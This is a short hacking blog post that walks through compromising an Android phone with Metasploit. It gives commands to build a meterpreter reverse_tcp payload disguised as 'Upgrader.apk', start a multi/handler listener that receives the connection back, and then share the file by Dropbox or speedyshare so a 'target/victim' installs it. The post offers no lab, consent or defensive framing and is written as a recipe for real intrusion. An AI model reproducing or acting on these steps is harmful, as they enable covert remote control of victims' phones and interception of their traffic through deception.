Thursday, January 23, 2020

Exploiting a Mobile Device

Exploiting a Mobile Device


How To Write Your First Exploit????
A known toolkit for exploiting computers is Kali Linux , is also one of the most efficient tools to perform a hack on a mobile device. Simply follow these steps to perform a remote hack on a mobile device and install a malicious file on a targeted device.


  •  Open Kali Linux

 Type the following command in terminal:
root@kali:-# msfpayload android/meterpreter/reverse_tcp LHOST=[your device’s IP address] R > /root/Upgrader.apk


  • Now open a new terminal 

While Kali is creating your file, load another terminal and load the metasploit console.
enter the command: 
root@kali:-# Msfconsole

Now set up the listener
Once metasploit is up, load the multi-handler exploit by entering the command: 
root@kali:-# use exploit/multi/handler



  •  Create the reverse

Afterward, create the reverse payload by typing the following command: 
root@kali:-# set payload android/meterpreter/reverse_tcp 
Next, you will need to set up the Local host type in order for you to start receiving traffic. To do that, type the following command: 
root@kali:-#  set LHOST [Your device’s IP address]


  •  Start Exploit 

Now that you have your listener ready, you can now start your exploit by activating your listener. To do this, type the command: root@kali:-# exploit

If the malicious file that you have created a while ago is ready, copy it from the root folder to your mobile device, preferably an android phone. Afterwards, make that file available by uploading it on any file-sharing site such as speedyshare or Dropbox. Send the link to your target/victim, and ask him to install the app on her/him mobile.

Once your target user has installed the file, you can now receive the traffic that he is receiving through his mobile device!


If you are using Termux So first install Metasploit And follow this steps 


Thanks For  reading "If any problem please comment" 


0 comments:

Post a Comment

Hack Me Tech